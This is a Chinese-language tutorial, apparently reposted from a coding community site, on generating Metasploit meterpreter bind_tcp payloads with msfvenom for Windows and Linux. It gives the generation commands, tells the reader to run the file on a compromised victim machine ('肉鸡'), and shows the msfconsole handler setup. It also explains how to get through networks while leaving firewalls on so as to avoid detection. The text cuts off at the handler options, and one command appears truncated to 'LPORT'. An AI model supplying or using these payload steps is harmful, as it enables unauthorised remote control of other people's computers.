Metasploit之各种Payload生成与实战作用详解（正向）-CFANZ编程社区

使用场景

场景还是得具体看，⽐如⽬标机器不给其他除特定端⼝外的端⼝出站，那就只能能正向；还有⽐如有⼀种情
况，⽬标处于深层⽹络，不能直接连通外⽹，也不能通过其他机器连通，因为其他机器防⽕墙都开着，为避免
在有防⽕墙监控的情况下关闭防⽕墙⽽被发现，也只能⽤正向的马，然后通过开着防⽕墙的机器来进⾏端⼝的
转发达到穿透的⽬的

msfvenom生成正向Paylaod

msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f exe >/root/bind_xx.exe 

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=<Attack Port> -f exe >/root/bind_xx.exe

msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll 

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=<Attack Port> -f elf >/root/bind_xx.elf

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=<Attack Port> -f elf >/root/bind_xx.elf

因为我win7虚拟机是x64位系统，我就用这条命令：

LPORT

在肉鸡上运行：bind_xx.exe:

可以看到，已经开放了9090端口！

接下来打开msfconsole对肉鸡进行连接(前提是对方防火墙是关闭了的)：

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target